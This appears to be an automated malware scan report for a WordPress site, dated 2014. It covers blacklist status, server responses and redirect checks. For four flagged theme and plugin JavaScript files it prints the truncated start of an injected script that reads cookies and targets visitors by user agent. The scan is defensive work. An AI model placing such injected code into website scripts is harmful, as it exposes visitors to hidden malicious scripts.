Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=parawanik.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://parawanik.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://www.parawanik.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 16 Sep 2014 00:21:37 GMT Pragma: no-cache Location: http://parawanik.com/ Server: Apache/2 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.parawanik.com Set-Cookie: PHPSESSID=2b070c94e875491d19d0c8be17b90e43; path=/ Set-Cookie: wpsc_customer_cookie_ff9144d6751c4cff74482984f04efd49=_vbPjzdoJ%25moO%7C1410999696%7C8a9a5bb755f55f0163519b6b1515af50; expires=Thu, 18-Sep-2014 00:21:36 GMT; path=/; httponly X-Pingback: http://parawanik.com/xmlrpc.php | clean |
http://parawanik.com/ | 200 OK Content-Length: 25712 Content-Type: text/html | clean |
http://parawanik.com/wp-content/themes/fall_school_starts_ote085/script.js | 200 OK Content-Length: 7459 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
    return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
    var resiser = navigator.userAgent;
    var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
if (this.A) this.A.className += " artmenuhoverA"; };
oLI.onmouseleave = function() {
    this.className = this.className.replace(/menuhover/,"");
    this.UL.className = this.UL.className.replace(/menuhoverUL/,"");
    if (this.A) this.A.className = this.A.className.replace(/menuhoverA/,"");
}; } } } }
artLoadEvent.add(Menu_IE6Setup);
Antivirus reports:
http://parawanik.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 94993 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
    return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
    var resiser = navigator.userAgent;
    var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
Antivirus reports:
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.9.5.649230 | 200 OK Content-Length: 30065 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/jquery.infieldlabel.min.js?ver=3.8.9.5.649230 | 200 OK Content-Length: 1787 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/ajax.js?ver=3.8.9.5.649230 | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://parawanik.com/index.php?wpsc_user_dynamic_js=true&ver=3.8.9.5.649230 | 200 OK Content-Length: 982 Content-Type: text/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.9.5649230 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1750 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/social-gallery-lite/js/socialGalleryPluginLite.js | 200 OK Content-Length: 16231 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 29500 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
    return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
    var resiser = navigator.userAgent;
    var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
} this.selected = select; } }); };
$.fn.ajaxSubmit.debug = false;
function log() {
    if (!$.fn.ajaxSubmit.debug) return;
    var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,'');
    if (window.console && window.console.log) { window.console.log(msg); }
    else if (window.opera && window.opera.postError) { window.opera.postError(msg); }
};
})(jQuery);
Antivirus reports:
http://parawanik.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.1 | 200 OK Content-Length: 7312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
    return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
    var resiser = navigator.userAgent;
    var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
$(this).find('span.wpcf7-not-valid-tip').remove();
$(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); };
$.fn.wpcf7FillResponseOutput = function(message) {
    return this.each(function() {
        $(this).find('div.wpcf7-response-output').append(message).slideDown('fast');
    });
};
})(jQuery);
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: parawanik.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Sep 2014 00:21:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=parawanik.com
Set-Cookie: PHPSESSID=6918cc63aaa9837a4a0a70ab724bce9d; path=/
Set-Cookie: wpsc_customer_cookie_ff9144d6751c4cff74482984f04efd49=_U%29B2l%29bsMkNe%7C1410999698%7C23d4244c60128d44c5f2c565f96cc447; expires=Thu, 18-Sep-2014 00:21:38 GMT; path=/; httponly
X-Pingback: http://parawanik.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: parawanik.com
Referer: http://www.google.com/search?q=parawanik.com
Result:
The result is similar to the first query. There are no suspicious redirects found.